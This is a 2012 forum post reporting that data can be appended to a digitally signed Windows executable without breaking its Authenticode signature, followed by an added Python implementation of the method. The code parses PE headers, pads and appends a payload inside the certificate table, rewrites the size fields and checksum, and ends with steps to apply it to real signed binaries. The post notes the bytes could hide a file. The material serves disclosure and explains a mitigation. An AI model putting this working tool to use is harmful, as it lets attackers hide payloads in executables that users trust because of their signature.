04-29-2012, 01:08 AM
(This post was last modified: 04-29-2012, 01:16 AM by AceInfinity.)
Through a slightly methodical process I've noticed that Digital Signatures might not be as reliable as they were intended to be. The scary part is that this flaw still exists in Windows 8 as well, from what I've tested.
The worst part is that this could be avoided with a very simple patch: using a file hash as well. But I was able to successfully modify a digitally signed mseinstall.exe, straight from Microsoft, WITHOUT invalidating the Digital Signature!
For evidence, I added some simple text to show you the modification:
Note: This could just as well be the bytes of a hidden file within the executable, unbeknownst to the person trusting in the Digital Signature.
Uh oh...
Through some very basic steps, this can be done with any file with ease. All I needed to do was append some garbage bytes to the end of the file at EOF, making sure that these additional bytes were a multiple of the FileAlignment specified in the Optional Header (the FileAlignment for this Microsoft Security Essentials installer was 200 bytes in this case), increase the size of the certificate within the Data Directories by the total number of bytes I added at EOF, and also increase the size stored inside the certificate itself (should be the first 4 bytes).
Then update the checksum in the Optional Header once everything is said and done; this is only really necessary if the digitally signed executable is a boot program.
Lastly, not ONLY is the Digital Signature STILL valid, but the program still works as well. And this can be done with as much data as you want.
It would also be possible to modify other sections of bytes in the file, as long as the signature was based on the MD5 algorithm and they are kept the same.
http://msdn.microsoft.com/en-us/library/...e.10).aspx
*Updated this post with downloadable test files from the images: http://www.mediafire.com/?engk4c78jokopet
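The steps described in the post above, written out as an added Python example (this is editor-supplied code, not part of the original post or its downloadable test files). `append_to_signed_pe` parses the PE headers, appends the payload padded to FileAlignment as the post does, bumps both the security data-directory `Size` and the `WIN_CERTIFICATE.dwLength`, and recomputes the PE checksum. `authenticode_hashed_bytes` is a simplified view of what the Authenticode hash covers (everything except the CheckSum field, the security directory entry and the certificate table), and it returns identical bytes before and after the append, which is why the signature stays valid. The sample image from `build_sample_pe` is a constructed, non-loadable PE32 skeleton with a dummy certificate table; all function names here are mine, and the code assumes a single `WIN_CERTIFICATE` entry sitting at the very end of the file.

```python
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4   # data directory that points at the certificate table


def _u16(b, off):
    return struct.unpack_from("<H", b, off)[0]


def _u32(b, off):
    return struct.unpack_from("<I", b, off)[0]


def locate_security_directory(data):
    """Return (FileAlignment, offset of CheckSum field, offset of security directory entry)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    pe_off = _u32(data, 0x3C)                     # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    opt_off = pe_off + 24                         # optional header follows the 20-byte COFF header
    magic = _u16(data, opt_off)
    if magic == 0x10B:                            # PE32: data directories start at +96
        dirs_off = opt_off + 96
    elif magic == 0x20B:                          # PE32+: data directories start at +112
        dirs_off = opt_off + 112
    else:
        raise ValueError("unknown optional header magic 0x%x" % magic)
    return (_u32(data, opt_off + 36),             # FileAlignment
            opt_off + 64,                         # CheckSum (same offset in PE32 and PE32+)
            dirs_off + IMAGE_DIRECTORY_ENTRY_SECURITY * 8)


def cert_table_info(data):
    """(file offset, directory Size, WIN_CERTIFICATE.dwLength) of the certificate table."""
    _, _, secdir_off = locate_security_directory(data)
    cert_off, cert_size = _u32(data, secdir_off), _u32(data, secdir_off + 4)
    return cert_off, cert_size, (_u32(data, cert_off) if cert_size else 0)


def pe_checksum(data, checksum_off):
    """PE image checksum (the MapFileAndCheckSum algorithm, as also implemented in pefile).
    The CheckSum field is skipped, so the result does not depend on its current value."""
    padded = data + b"\0" * (-len(data) % 4)
    total = 0
    for i in range(0, len(padded), 4):
        if i == checksum_off:
            continue
        total += _u32(padded, i)
        if total >= 1 << 32:
            total = (total & 0xFFFFFFFF) + (total >> 32)
    total = (total & 0xFFFF) + (total >> 16)
    total += total >> 16
    return ((total & 0xFFFF) + len(data)) & 0xFFFFFFFF


def checksum_is_valid(data):
    _, checksum_off, _ = locate_security_directory(data)
    return _u32(data, checksum_off) == pe_checksum(data, checksum_off)


def authenticode_hashed_bytes(data):
    """Simplified: the file minus CheckSum, the security directory entry and the cert table.
    (The real procedure also orders sections by PointerToRawData; irrelevant for the
    sectionless sample below, and nearly always the file order anyway.)"""
    _, checksum_off, secdir_off = locate_security_directory(data)
    cert_off, cert_size, _ = cert_table_info(data)
    parts = [data[:checksum_off], data[checksum_off + 4:secdir_off]]
    if cert_size:
        parts += [data[secdir_off + 8:cert_off], data[cert_off + cert_size:]]
    else:
        parts.append(data[secdir_off + 8:])
    return b"".join(parts)


def append_to_signed_pe(data, payload):
    """Append payload inside the certificate table so the Authenticode hash is unchanged."""
    file_alignment, checksum_off, secdir_off = locate_security_directory(data)
    cert_off, cert_size, dw_length = cert_table_info(data)
    if cert_size == 0:
        raise ValueError("file has no certificate table")
    if cert_off + cert_size != len(data):
        raise ValueError("certificate table is not the last thing in the file")
    if dw_length != cert_size:
        raise ValueError("more than one WIN_CERTIFICATE entry; not handled here")
    padded = payload + b"\0" * (-len(payload) % (file_alignment or 8))   # pad as the post does
    out = bytearray(data + padded)
    struct.pack_into("<I", out, cert_off, cert_size + len(padded))        # WIN_CERTIFICATE.dwLength
    struct.pack_into("<I", out, secdir_off + 4, cert_size + len(padded))  # directory Size
    struct.pack_into("<I", out, checksum_off, pe_checksum(bytes(out), checksum_off))
    return bytes(out)


def build_sample_pe(file_alignment=0x200):
    """Constructed, non-loadable PE32 skeleton (no sections) with a dummy 16-byte
    certificate table at EOF. Fixture only, not a real signed file."""
    hdr = bytearray(0x200)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x40)                                   # e_lfanew
    hdr[0x40:0x44] = b"PE\0\0"
    struct.pack_into("<HHIIIHH", hdr, 0x44, 0x14C, 0, 0, 0, 0, 224, 0x102)    # COFF file header
    opt = 0x58
    struct.pack_into("<H", hdr, opt, 0x10B)                                   # PE32 magic
    struct.pack_into("<II", hdr, opt + 32, 0x1000, file_alignment)            # Section/FileAlignment
    struct.pack_into("<I", hdr, opt + 60, len(hdr))                           # SizeOfHeaders
    struct.pack_into("<I", hdr, opt + 92, 16)                                 # NumberOfRvaAndSizes
    cert = struct.pack("<IHH", 16, 0x0200, 0x0002) + b"\xAA" * 8              # fake WIN_CERTIFICATE
    struct.pack_into("<II", hdr, opt + 96 + IMAGE_DIRECTORY_ENTRY_SECURITY * 8, len(hdr), len(cert))
    data = bytearray(hdr + cert)
    struct.pack_into("<I", data, opt + 64, pe_checksum(bytes(data), opt + 64))
    return bytes(data)
```

Two practical notes. The certificate table only has to be 8-byte aligned per the PE spec, so padding to FileAlignment is more than strictly required, but harmless. And the result is only interesting on a real signed binary: read the file, pass it through `append_to_signed_pe`, write it back, and check it with `signtool verify /v /pa` or PowerShell's `Get-AuthenticodeSignature`; a verifier that also compares a full-file hash (the mitigation the post asks for) would reject the output while Authenticode alone accepts it.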